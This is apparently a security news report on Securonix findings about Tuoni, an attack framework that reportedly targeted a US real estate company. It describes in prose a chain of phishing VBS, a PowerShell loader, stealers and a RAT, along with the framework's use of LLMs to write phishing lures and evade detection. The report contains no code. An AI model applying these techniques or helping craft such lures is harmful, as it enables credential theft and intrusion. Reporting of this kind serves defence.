Security researchers have identified a previously unknown, AI-enhanced attack framework named Tuoni targeting a major US real estate company. The discovery was made by analysts at Securonix Threat Labs, who observed the framework leveraging large language models (LLMs) to augment its offensive capabilities.

The attack demonstrates the integration of artificial intelligence into malware frameworks to create more sophisticated and evasive threats. The primary goal of the operation appeared to be credential theft and establishing persistent access to the victim’s network.

Dissecting the Tuoni Attack Chain

The initial intrusion vector was a highly sophisticated phishing email. This email contained a malicious Visual Basic Script (VBS) attachment. Once the victim executed the script, it triggered a PowerShell loader designed to download and run additional malicious payloads from a remote server.

The payloads deployed during the attack included multiple information stealers, which were engineered to harvest credentials and browser cookies. In addition to the stealers, a remote access trojan (RAT) was deployed, granting the attackers persistent control over the compromised system.

The Role of Artificial Intelligence

The central component of this operation is the Tuoni framework, named after a deity from Finnish mythology. This framework’s defining feature is its use of LLM APIs to generate dynamic, context-aware malicious content. By interfacing with AI models, the attackers can create highly convincing phishing lures tailored to their targets.

This AI integration also allows the framework to dynamically adapt its communication patterns and other tactical elements. This adaptability makes the attack more difficult for traditional, signature-based security tools to detect. The research from Securonix confirmed that the framework was actively using these AI capabilities to enhance the effectiveness of the attack against the real estate firm.

Source: https://www.infosecurity-magazine.com/news/ai-tuoni-framework-targets-us-real/